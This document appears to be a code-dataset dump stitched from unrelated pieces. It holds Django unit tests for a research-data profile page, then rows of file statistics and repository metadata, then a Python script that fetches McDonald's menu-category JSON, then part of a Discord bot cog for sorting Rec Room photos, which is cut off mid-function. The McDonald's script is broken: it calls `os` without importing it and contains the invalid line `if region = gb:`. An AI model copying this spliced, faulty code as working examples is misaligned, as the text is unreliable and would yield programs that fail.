study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
archived_tagged_trait = TaggedTraitFactory.create(
trait__source_dataset__source_study_version__study=study, creator=self.user, archived=True)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(archived_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_delete_link_present_for_unreviewed_taggedtrait(self):
"""The taggedtrait delete link is present in the html for a taggedtrait that is not reviewed."""
tagged_trait = TaggedTraitFactory.create(creator=self.user)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertContains(response, tagged_trait_delete_url)
def test_delete_link_not_present_for_confirmed_taggedtrait(self):
"""The taggedtrait delete link is not present in the html for a taggedtrait that is confirmed."""
dcc_review = DCCReviewFactory.create(status=DCCReview.STATUS_CONFIRMED, tagged_trait__creator=self.user)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[dcc_review.tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertNotContains(response, tagged_trait_delete_url)
def test_delete_link_not_present_for_needsfollowup_taggedtrait(self):
"""The taggedtrait delete link is not present in the html for a taggedtrait that needs followup."""
dcc_review = DCCReviewFactory.create(status=DCCReview.STATUS_FOLLOWUP, tagged_trait__creator=self.user)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[dcc_review.tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertNotContains(response, tagged_trait_delete_url)
def test_no_deprecated_tagged_traits(self):
"""The list of 'my tagged traits' does not include deprecated tagged traits."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
other_tagged_trait = TaggedTraitFactory.create(
creator=self.user,
trait__source_dataset__source_study_version__study=study,
trait__source_dataset__source_study_version__i_is_deprecated=True
)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(other_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = [x.pk for x in tagged_traits]
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
class RecipeSubmitterLoginTestCaseProfileTest(RecipeSubmitterLoginTestCase):
def setUp(self):
super(RecipeSubmitterLoginTestCaseProfileTest, self).setUp()
def get_url(self, *args):
return reverse('profiles:profile')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertIn('show_tabs', context)
self.assertTrue(context['show_tabs'])
self.assertIn('show_recipes', context)
self.assertIn('unit_recipe_table', context)
self.assertIn('harmonization_recipe_table', context)
self.assertNotIn('user_taggedtraits', context)
self.assertNotIn('study_taggedtrait_counts', context)
def test_has_no_tagged_phenotypes_tabs(self):
"""Recipe submitter does not see 'my tagged variables' or 'tagged variables in my studies'."""
response = self.client.get(self.get_url())
context = response.context
self.assertNotContains(response, 'id="user_tagged_phenotypes"')
self.assertNotContains(response, 'id="study_tagged_phenotypes"')
def test_has_recipes_tabs(self):
"""Recipe submitter sees both recipes tabs."""
response = self.client.get(self.get_url())
context = response.context
self.assertTrue(context['show_recipes'])
self.assertContains(response, 'id="unitrecipes"')
self.assertContains(response, 'id="harmonizationrecipes"')
def test_has_correct_recipe_count(self):
"""Tables of recipes have the correct number of rows for this user."""
unit_recipes = UnitRecipeFactory.create_batch(10, creator=self.user)
harmonization_recipes = HarmonizationRecipeFactory.create_batch(10, creator=self.user)
other_unit_recipe = UnitRecipeFactory.create()
other_harmonization_recipe = HarmonizationRecipeFactory.create()
response = self.client.get(self.get_url())
context = response.context
self.assertNotIn(other_unit_recipe, context['unit_recipe_table'].data)
self.assertNotIn(other_harmonization_recipe, context['harmonization_recipe_table'].data)
self.assertEqual(len(context['unit_recipe_table'].rows), len(unit_recipes))
self.assertEqual(len(context['harmonization_recipe_table'].rows), len(harmonization_recipes))
class PhenotypeTaggerLoginTestCaseProfileTest(PhenotypeTaggerLoginTestCase):
def setUp(self):
super(PhenotypeTaggerLoginTestCaseProfileTest, self).setUp()
def get_url(self, *args):
return reverse('profiles:profile')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertTrue(context['show_tabs'])
self.assertFalse(context['show_recipes'])
self.assertTrue(context['show_my_tagged'])
self.assertTrue(context['show_study_tagged'])
self.assertNotIn('unit_recipe_table', context)
self.assertNotIn('harmonization_recipe_table', context)
self.assertIn('user_taggedtraits', context)
self.assertIn('study_taggedtrait_counts', context)
def test_has_correct_tagged_phenotypes_tabs(self):
"""Tagger user does see My Tagged Phenotypes."""
response = self.client.get(self.get_url())
context = response.context
self.assertContains(response, 'id="user_tagged_phenotypes"')
self.assertContains(response, 'id="study_tagged_phenotypes"')
def test_has_no_recipes_tabs(self):
"""Regular user does not see any recipes."""
response = self.client.get(self.get_url())
context = response.context
self.assertFalse(context['show_recipes'])
self.assertNotContains(response, 'id="unitrecipes"')
self.assertNotContains(response, 'id="harmonizationrecipes"')
def test_my_tagged_variables_correct_empty(self):
"""The list of 'my tagged traits' is correct when the user has no taggedtraits."""
response = self.client.get(self.get_url())
context = response.context
self.assertEqual(context['user_taggedtraits'], [])
def test_my_tagged_variables_correct_count(self):
"""The list of 'my tagged traits' has the correct count of taggedtraits."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
expected_pks = [x.pk for x in tagged_traits]
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_correct_count_with_archived_tagged_trait(self):
"""The list of 'my tagged traits' has the correct count of taggedtraits when one is archived."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
archived_tagged_trait = TaggedTraitFactory.create(
trait__source_dataset__source_study_version__study=study, creator=self.user, archived=True)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_excludes_trait_tagged_by_other_user(self):
"""The list of 'my tagged traits' does not include traits tagged by another user."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
other_tagged_trait = TaggedTraitFactory.create(trait__source_dataset__source_study_version__study=study)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(other_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_my_tagged_variables_excludes_archived_tagged_trait(self):
"""The list of 'my tagged traits' does not include an archived tagged trait."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
archived_tagged_trait = TaggedTraitFactory.create(
trait__source_dataset__source_study_version__study=study, creator=self.user, archived=True)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(archived_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = list(TaggedTrait.objects.non_archived().filter(creator=self.user).values_list('pk', flat=True))
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
def test_study_tagged_variables_correct_empty(self):
"""The counts of 'tagged variables from my studies' is correct when the study and user have no taggedtraits."""
response = self.client.get(self.get_url())
context = response.context
self.assertEqual(context['study_taggedtrait_counts'], [])
def test_study_tagged_variables_correct_count(self):
"""The counts of 'tagged variables from my studies' has the correct count of taggedtraits."""
user_tagged_trait = TaggedTraitFactory.create(creator=self.user,
trait__source_dataset__source_study_version__study=self.study)
other_study_taggedtrait = TaggedTraitFactory.create()
response = self.client.get(self.get_url())
context = response.context
study_data = context['study_taggedtrait_counts']
self.assertEqual(self.user.profile.taggable_studies.count(), len(study_data))
study1_tag_pks = [el['tag_pk'] for el in study_data[0][1]]
self.assertIn(user_tagged_trait.tag.pk, study1_tag_pks)
self.assertNotIn(other_study_taggedtrait.tag.pk, study1_tag_pks)
self.assertEqual(study_data[0][1][0]['tt_count'], 1)
def test_study_tagged_variables_correct_count_with_archived_tagged_trait(self):
"""The counts of 'tagged variables from my studies' does not include an archived tagged trait."""
user_tagged_trait = TaggedTraitFactory.create(
creator=self.user, trait__source_dataset__source_study_version__study=self.study)
archived_taggedtrait = TaggedTraitFactory.create(
creator=self.user, trait__source_dataset__source_study_version__study=self.study, archived=True,
tag=user_tagged_trait.tag)
response = self.client.get(self.get_url())
context = response.context
study_data = context['study_taggedtrait_counts']
self.assertEqual(self.user.profile.taggable_studies.count(), len(study_data))
study1_tag_pks = [el['tag_pk'] for el in study_data[0][1]]
self.assertIn(user_tagged_trait.tag.pk, study1_tag_pks)
self.assertEqual(study_data[0][1][0]['tt_count'], 1)
def test_study_tagged_variables_includes_trait_tagged_by_other_user(self):
"""The counts of 'tagged variables from my studies' does include traits tagged by another user."""
user_tagged_trait = TaggedTraitFactory.create(creator=self.user,
trait__source_dataset__source_study_version__study=self.study)
other_user_taggedtrait = TaggedTraitFactory.create(
tag=user_tagged_trait.tag,
trait__source_dataset__source_study_version__study=self.study)
response = self.client.get(self.get_url())
context = response.context
study_data = context['study_taggedtrait_counts']
self.assertEqual(self.user.profile.taggable_studies.count(), len(study_data))
study1_tag_pks = [el['tag_pk'] for el in study_data[0][1]]
self.assertIn(user_tagged_trait.tag.pk, study1_tag_pks)
self.assertEqual(study_data[0][1][0]['tt_count'], 2)
def test_study_tagged_variables_excludes_archived_tagged_trait(self):
"""The counts of 'tagged variables from my studies' does not include an archived tagged trait."""
user_tagged_trait = TaggedTraitFactory.create(
creator=self.user, trait__source_dataset__source_study_version__study=self.study)
archived_taggedtrait = TaggedTraitFactory.create(
creator=self.user, trait__source_dataset__source_study_version__study=self.study, archived=True,
tag=user_tagged_trait.tag)
response = self.client.get(self.get_url())
context = response.context
study_data = context['study_taggedtrait_counts']
self.assertEqual(self.user.profile.taggable_studies.count(), len(study_data))
study1_tag_pks = [el['tag_pk'] for el in study_data[0][1]]
self.assertIn(user_tagged_trait.tag.pk, study1_tag_pks)
self.assertEqual(study_data[0][1][0]['tt_count'], 1)
def test_delete_link_present_for_unreviewed_taggedtrait(self):
"""The taggedtrait delete link is present in the html for a taggedtrait that is not reviewed."""
tagged_trait = TaggedTraitFactory.create(creator=self.user,
trait__source_dataset__source_study_version__study=self.study)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertContains(response, tagged_trait_delete_url)
def test_delete_link_not_present_for_confirmed_taggedtrait(self):
"""The taggedtrait delete link is not present in the html for a taggedtrait that is confirmed."""
dcc_review = DCCReviewFactory.create(
status=DCCReview.STATUS_CONFIRMED,
tagged_trait__creator=self.user,
tagged_trait__trait__source_dataset__source_study_version__study=self.study)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[dcc_review.tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertNotContains(response, tagged_trait_delete_url)
def test_delete_link_not_present_for_needsfollowup_taggedtrait(self):
"""The taggedtrait delete link is not present in the html for a taggedtrait that needs followup."""
dcc_review = DCCReviewFactory.create(
status=DCCReview.STATUS_FOLLOWUP,
tagged_trait__creator=self.user,
tagged_trait__trait__source_dataset__source_study_version__study=self.study)
tagged_trait_delete_url = reverse('tags:tagged-traits:pk:delete', args=[dcc_review.tagged_trait.pk])
response = self.client.get(self.get_url())
self.assertNotContains(response, tagged_trait_delete_url)
def test_study_tagged_variables_correct_count_with_deprecated_trait(self):
"""The counts of 'tagged variables from my studies' does not include a deprecated tagged trait."""
study = StudyFactory.create()
tagged_trait = TaggedTraitFactory.create(
creator=self.user, trait__source_dataset__source_study_version__study=self.study)
other_tagged_trait = TaggedTraitFactory.create(
creator=self.user,
trait__source_dataset__source_study_version__study=self.study,
trait__source_dataset__source_study_version__i_is_deprecated=True
)
response = self.client.get(self.get_url())
context = response.context
study_data = context['study_taggedtrait_counts']
self.assertEqual(self.user.profile.taggable_studies.count(), len(study_data))
study1_tag_pks = [el['tag_pk'] for el in study_data[0][1]]
self.assertIn(tagged_trait.tag.pk, study1_tag_pks)
self.assertNotIn(other_tagged_trait.tag.pk, study1_tag_pks)
self.assertEqual(study_data[0][1][0]['tt_count'], 1)
def test_study_tagged_variables_excludes_deprecated_tagged_traits(self):
"""The list of 'my tagged traits' does not include deprecated tagged traits."""
study = StudyFactory.create()
tagged_traits = TaggedTraitFactory.create_batch(
2, creator=self.user,
trait__source_dataset__source_study_version__study=study)
other_tagged_trait = TaggedTraitFactory.create(
creator=self.user,
trait__source_dataset__source_study_version__study=study,
trait__source_dataset__source_study_version__i_is_deprecated=True
)
response = self.client.get(self.get_url())
context = response.context
study_data = context['user_taggedtraits'][0][0]
study_tag_data = context['user_taggedtraits'][0][1]
all_tagged_trait_pks = [[[el['taggedtrait_pk'] for el in taggedtraits] for tag, taggedtraits in tag_taggedtraits] for study, tag_taggedtraits in context['user_taggedtraits']] # noqa
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest once.
all_tagged_trait_pks = [x for y in all_tagged_trait_pks for x in y] # Unnest twice.
self.assertNotIn(other_tagged_trait.pk, all_tagged_trait_pks)
expected_pks = [x.pk for x in tagged_traits]
self.assertEqual(sorted(all_tagged_trait_pks), expected_pks)
class ProfilesLoginRequiredTestCase(LoginRequiredTestCase):
def test_profiles_login_required(self):
"""All profiles urls redirect to login page if no user is logged in."""
self.assert_redirect_all_urls('profiles')
| 57.930403
| 190
| 0.715934
| 3,971
| 31,630
| 5.386301
| 0.045832
| 0.067885
| 0.0432
| 0.052457
| 0.930993
| 0.926972
| 0.912338
| 0.902052
| 0.892842
| 0.883117
| 0
| 0.004484
| 0.189187
| 31,630
| 545
| 191
| 58.036697
| 0.829525
| 0.105786
| 0
| 0.863014
| 0
| 0
| 0.083541
| 0.034315
| 0
| 0
| 0
| 0
| 0.251142
| 1
| 0.116438
| false
| 0
| 0.013699
| 0.009132
| 0.150685
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
20a0c23023d15457deefb5e0806c84027bf4d2da
| 4,099
|
py
|
Python
|
menu.py
|
SketchMaster2001/mcdonalds_api
|
7795820b264a562748c790775824ff1e39d03679
|
[
"MIT"
] | 2
|
2021-04-26T20:51:09.000Z
|
2021-04-28T02:55:16.000Z
|
menu.py
|
SketchMaster2001/mcdonalds_api
|
7795820b264a562748c790775824ff1e39d03679
|
[
"MIT"
] | null | null | null |
menu.py
|
SketchMaster2001/mcdonalds_api
|
7795820b264a562748c790775824ff1e39d03679
|
[
"MIT"
] | null | null | null |
import json
import requests
from dotenv import load_dotenv
load_dotenv()
region = os.getenv('region')
def beverages():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100000.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def breakfast():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100001.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def condiments():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100002.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def desserts():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100003.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
# There is a salad category but it is empty, go figure!
def salad():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100004.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def beef():
if region = gb:
food = requests.get(f"https://www.mcdonalds.com/services/mcd/categoryDetails.gb.en-gb.100038.true.true..false.json")
else:
food = requests.get(f"https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100005.true.true..false.json")
get_json = food.json()
result = json.dumps(get_json)
return result
def sides():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100006.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def chicken():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100007.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def mccafe():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100008.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def happymeals():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100009.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def happymeal_entree():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100010.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def happymeal_sides():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100011.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def happymeal_drinks():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100012.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def happymeal_yogurt():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100013.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def sandwiches():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100014.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def valuepicks():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100015.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def hidden():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100016.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
def featured():
food = requests.get('https://www.mcdonalds.com/services/mcd/categoryDetails.ca.en-ca.100019.true.true..false.json')
get_json = food.json()
result = json.dumps(get_json)
return result
| 23.289773
| 118
| 0.72969
| 612
| 4,099
| 4.818627
| 0.124183
| 0.085453
| 0.096643
| 0.128857
| 0.865039
| 0.865039
| 0.865039
| 0.865039
| 0.865039
| 0.865039
| 0
| 0.031319
| 0.111979
| 4,099
| 175
| 119
| 23.422857
| 0.778846
| 0.01293
| 0
| 0.55102
| 0
| 0.193878
| 0.433944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.030612
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
20db55c44b1b5f72e6bb3171210f5f6fcfb23404
| 182
|
py
|
Python
|
core/models/mobilenet_v3/__init__.py
|
matthew-wave/pool
|
698c140d161f369ef6a198dec9ab8b91a4532fa8
|
[
"MIT"
] | 6
|
2020-04-17T10:13:28.000Z
|
2020-10-13T08:16:32.000Z
|
core/models/mobilenet_v3/__init__.py
|
matthew-wave/pool
|
698c140d161f369ef6a198dec9ab8b91a4532fa8
|
[
"MIT"
] | null | null | null |
core/models/mobilenet_v3/__init__.py
|
matthew-wave/pool
|
698c140d161f369ef6a198dec9ab8b91a4532fa8
|
[
"MIT"
] | 1
|
2021-05-14T08:11:08.000Z
|
2021-05-14T08:11:08.000Z
|
from core.models.mobilenet_v3.get_mobilenet import large, large_minimalistic, small, small_minimalistic, edge_tpu
import core.models.mobilenet_v3.mobilenet_v3 as origin_mobilenet_v3
| 60.666667
| 113
| 0.879121
| 27
| 182
| 5.592593
| 0.518519
| 0.291391
| 0.251656
| 0.278146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023529
| 0.065934
| 182
| 2
| 114
| 91
| 0.864706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4555b245f70b887fce2bd8e8a18659c525897171
| 21,144
|
py
|
Python
|
cogs/legacy.py
|
bubby932/RecNetBotV2
|
ed846791584ed344d55357e0989eb241ee6f13b0
|
[
"MIT"
] | 5
|
2021-07-16T21:12:14.000Z
|
2022-03-12T18:59:47.000Z
|
cogs/legacy.py
|
bubby932/RecNetBotV2
|
ed846791584ed344d55357e0989eb241ee6f13b0
|
[
"MIT"
] | 1
|
2021-12-02T06:43:55.000Z
|
2021-12-02T06:43:55.000Z
|
cogs/legacy.py
|
bubby932/RecNetBotV2
|
ed846791584ed344d55357e0989eb241ee6f13b0
|
[
"MIT"
] | 8
|
2021-08-08T21:35:42.000Z
|
2022-02-18T20:21:48.000Z
|
import functions
import requests
import discord
from discord.ext import commands
def reset_txt(txt):
print("Reset")
open(txt, 'w').close()
class Legacy(commands.Cog):
def __init__(self, client):
self.client = client
# LEGACY COMMANDS
# CMD-SORTBY
@commands.command()
@commands.check(functions.beta_tester)
async def lsortby(self, ctx, profile, mode):
functions.log(ctx.guild.name, ctx.author, ctx.command)
account = functions.check_account_existence_and_return(profile)
if account:
photos = functions.id_to_photos(account['account_id'])
if photos:
mode = mode.lower()
reverse_sort = True
if mode == "cheers":
mode = lambda i: i["CheerCount"]
file_name = f"Sorted by CHEERS {account['username']}.txt"
reverse_sort = True
elif mode == "comments":
mode = lambda i: i["CommentCount"]
file_name = f"Sorted by COMMENTS {account['username']}.txt"
reverse_sort = True
elif mode == "oldest":
mode = lambda i: i["CreatedAt"]
file_name = f"Sorted by OLDEST {account['username']}.txt"
reverse_sort = False
elif mode == "latest":
mode = lambda i: i["CreatedAt"]
file_name = f"Sorted by LATEST {account['username']}.txt"
reverse_sort = True
else:
mode = None
if mode:
save_msg = ""
sorted_photos = sorted(photos, key = mode, reverse = reverse_sort)
with open("temp_txt.txt","w") as text_file:
for photo in sorted_photos:
save_msg += f"https://rec.net/image/{photo['Id']}\n"
save_msg += f"Date: {photo['CreatedAt'][:10]} {photo['CreatedAt'][11:16]} UTC\n"
save_msg += f"Cheers: {photo['CheerCount']}\n"
save_msg += f"Comments: {photo['CommentCount']}\n"
save_msg += "\n"
text_file.write(save_msg)
with open("temp_txt.txt","rb") as text_file:
await ctx.send(file=discord.File(text_file, file_name))
reset_txt("temp_txt.txt")
else:
embed = functions.error_msg(ctx, "Invalid mode! Modes are `cheers`, `comments`, `latest`, `oldest`")
else:
embed = functions.error_msg(ctx, f"User `@{account['username']}` hasn't shared a single picture!")
else: # account doesn't exist
embed = functions.error_msg(ctx, f"User `@{profile}` doesn't exist!")
functions.embed_footer(ctx, embed) # get default footer from function
await ctx.send(embed=embed)
@lsortby.error
async def clear_error(self, ctx, error):
await functions.report_error(ctx, error, self.client.get_channel(functions.error_channel))
if isinstance(error, commands.MissingRequiredArgument):
embed = functions.error_msg(ctx, "Please include in an username and mode! \nUsage: `.lsortby <user> <latest|oldest|cheers|comments>`")
await ctx.send(embed=embed)
else:
pass
# CMD-TOGETHER
@commands.command()
@commands.check(functions.beta_tester)
async def ltogether(self, ctx, user1, user2):
functions.log(ctx.guild.name, ctx.author, ctx.command)
author = f"<@{ctx.author.id}>"
user1_account = functions.check_account_existence_and_return(user1)
user2_account = functions.check_account_existence_and_return(user2)
if user1_account and user2_account: #if both exist
user1_feed = functions.id_to_feed(user1_account['account_id'])
if user1_feed: # if user appears anywhere
msg = ""
save_msg = ""
photos_found = []
exceeded_limit = False
cheers = 0
comments = 0
together_images = functions.together(user1_account['account_id'], user2_account['account_id'])
for post in together_images:
photos_found.append(post['Id'])
msg += f"<https://rec.net/image/{post['Id']}>\n"
cheers += post['CheerCount']
comments += post['CommentCount']
save_msg += f"https://rec.net/image/{post['Id']}\n"
save_msg += f"Date: {post['CreatedAt'][:10]} {post['CreatedAt'][11:16]} UTC\n"
save_msg += f"Cheers: {post['CheerCount']}\n"
save_msg += f"Comments: {post['CommentCount']}\n"
save_msg += "\n"
if photos_found:
if len(msg) > 1500:
exceeded_limit = True
# message exceeded
msg = "*Message exceeded Discord's message length limit.*\n\n"
with open("temp_txt.txt","w") as text_file:
text_file.write(save_msg)
file_name = f"Together ^{user1_account['username']} and {user2_account['username']}.txt"
# first pic
msg += f"\n**First picture:** https://rec.net/image/{photos_found[len(photos_found)-1]}\n"
# latest picture
msg += f"**Latest picture:** https://rec.net/image/{photos_found[0]}\n\n"
# cheers
msg += f"<:CheerGeneral:803244099510861885> `{cheers}` *(CHEERS IN TOTAL)*\n"
# comments
msg += f"💬 `{comments}` *(COMMENTS IN TOTAL)*\n\n"
# results
msg += f"*Results:* `{len(photos_found)}`"
if exceeded_limit:
print("SEND")
with open("temp_txt.txt","rb") as text_file:
await ctx.send(f"{author}\n{msg}",file=discord.File(text_file, file_name))
reset_txt("temp_txt.txt")
else:
print("what")
await ctx.send(f"{author}\n{msg}")
else: # not found
embed = functions.error_msg(ctx, f"Couldn't find any post that features both `@{user1_account['username']}` and `@{user2_account['username']}`!")
await ctx.send(embed=embed)
else:
embed = functions.error_msg(ctx, f"Couldn't find any post that features both `@{user1_account['username']}` and `@{user2_account['username']}`!")
await ctx.send(embed=embed)
else: # either doesn't exist
embed = functions.error_msg(ctx, f"Either `@{user1}` or `@{user2}` don't exist!")
await ctx.send(embed=embed)
@ltogether.error
async def clear_error(self, ctx, error):
await functions.report_error(ctx, error, self.client.get_channel(functions.error_channel))
if isinstance(error, commands.MissingRequiredArgument):
embed = functions.error_msg(ctx, "Please include in 2 users! Usage: `.ltogether <user1> <user2>`")
await ctx.send(embed=embed)
else:
pass
# CMD-TAKENIN
@commands.command()
@commands.check(functions.beta_tester)
async def ltakenin(self, ctx, room, profile):
functions.log(ctx.guild.name, ctx.author, ctx.command)
author = f"<@{ctx.author.id}>"
room_data = functions.get_room_json(room)
if room_data: #if room exists
account = functions.check_account_existence_and_return(profile)
if account: # if account exists
photos = functions.id_to_photos(account['account_id'])
if photos: # if user has posted anything
msg = ""
save_msg = ""
photos_found = []
